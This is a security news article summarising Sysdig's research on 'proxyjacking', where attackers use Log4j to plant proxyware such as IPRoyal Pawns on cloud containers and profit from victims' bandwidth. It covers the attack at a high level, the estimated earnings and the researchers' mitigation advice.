Threat actors have found a lucrative new attack vector that hijacks legitimate proxyware services, which allow people to sell portions of their Internet bandwidth to third parties. In large-scale attacks that exploit cloud-based systems, cybercriminals can use this vector — dubbed "proxyjacking" — to earn potentially hundreds of thousands of dollars per month in passive income, researchers from Sysdig Threat Research Team (TRT) have found.

In a February blog post, Kaspersky researchers described proxyware services like this: "[Users install a client that creates a] proxy server. Installed on a desktop computer or smartphone, it makes the device's Internet connection accessible to an outside party." That outside party — the proxyware service — then resells an agreed-upon portion of the user's bandwidth to other people. 

"Depending on how long the program remains enabled and how much bandwidth it is permitted to use, the client accumulates points [for the user] that can eventually be converted into currency and transferred to a bank account," according to researchers at Kaspersky.

In one attack that the Sysdig researchers observed, threat actors compromised a container in a cloud environment using the Log4j vulnerability, and then installed a proxyware agent that turned the system into a proxy server without the container-owner's knowledge, the researchers revealed in a blog post on April 4.

This allowed the attacker to "sell the IP to a proxyware service and collect the profit," in an unusual type of Log4j exploit. Usually, Log4j attacks involve an actor dropping a backdoor or cryptojacking payload on the device, Crystal Morin, Sysdig threat research engineer, wrote in the post. "While Log4j attacks are common, the payload used in this case was uncommon," she wrote.

Proxyjacking shares characteristics of cryptojacking in that both profit off the bandwidth of a victim — and both are about equally profitable for the attacker, Morin said. However, these attacks differ in that attackers typically install CPU-based miners to extract maximum value from compromised systems, while proxyjacking mainly uses network resources — leaving a minimal CPU footprint, she wrote.

"Nearly every piece of monitoring software will have CPU usage as one of the first (and rightfully most important) metrics," she wrote. "Proxyjacking's effect on the system is marginal: 1 GB of network traffic spread out over a month is tens of megabytes per day — very likely to go unnoticed."

How Proxyjacking Works

Proxyjacking is a relatively new phenomenon spurred by the growth and use of proxyware services in the last couple of years, the researchers said. As mentioned, these services, such as IPRoyal, Honeygain, and Peer2Profit, are installed as apps or software on Internet-connected devices that, when running, allow someone to share Internet bandwidth by paying to use the IP address of the app users.

Proxyware comes in handy for people who want to use someone else's IP address for activity such as watching a YouTube video that isn't available in their region, conducting unrestricted Web scraping and surfing, or browsing dubious websites without attributing the activity to their own IP, the researchers said. According to the service, people pay for each IP address that someone shares via proxyware based on the number of hours they run the application.

In the attack investigated by Sysdig researchers, attackers targeted an unpatched Apache Solr service running in Kubernetes infrastructure to take control of a container in the environment, and then downloaded a malicious script from a command-and-control server (C2), which they placed in the /tmp folder to have privileges to perform their activity.

"The attacker's first execution was downloading an ELF file renamed /tmp/p32, which was then executed with some parameters, including the email address magyber1980@gmail[.]com and the associated password for their pawns.app account," Morin wrote in the post.

Pawns.app is a proxyware service that has been seen sharing IPs from IPRoyal's proxy network. Indeed, Sysdig TRT correlated the binary downloaded and executed in the malicious script to the command-line interface version of the IPRoyal Pawns application from GitHub, which uses the same parameters, researchers said. In this way, attackers began using the compromised pod to earn money on the service, they said.

Attackers covered their tracks by cleaning the compromised system of their activity, clearing the history, and removing the file they dropped in the containers and the temp files, the researchers added.

Impact & Mitigation for Proxyjacking Attacks

While the list of proxyware services reported as being used for proxyjacking is small right now, Sysdig researchers believe that this attack vector will continue to grow and eventually "defenders will uncover more nefarious activities," Morin wrote. "This is a low-effort and high-reward attack for threat actors, with the potential for far-reaching implications."

Researchers estimate that in 24 hours of activity for one proxyjacked IP address, an attacker can earn $9.60 per month. In a modest compromise of, say, 100 IP addresses then, a cybercriminal could net passive income of nearly $1,000 per month from this activity, they said.

When exploiting Log4j on unpatched systems, this figure can climb even higher, as millions of servers are still running vulnerable versions of the logging tool, and more than 23,000 of them can be reached from the Internet, according to Censys, the researchers said. "This vulnerability alone could theoretically provide more than $220,000 in profit per month" for an attacker, Morin wrote.

To avoid "receiving potentially shocking usage bills" due to proxyjacking activity, organizations need to take actions to mitigate potential attacks, the researchers said. They recommended that organizations set up billing limits and alerts with their respective cloud service provers, which can be an early indicator that something is amiss, Morin wrote.

Morin advised that organizations should also have threat-detection rules in place to receive alerts on any initial access and payload activity preceding the installation of a proxyware service application on your network.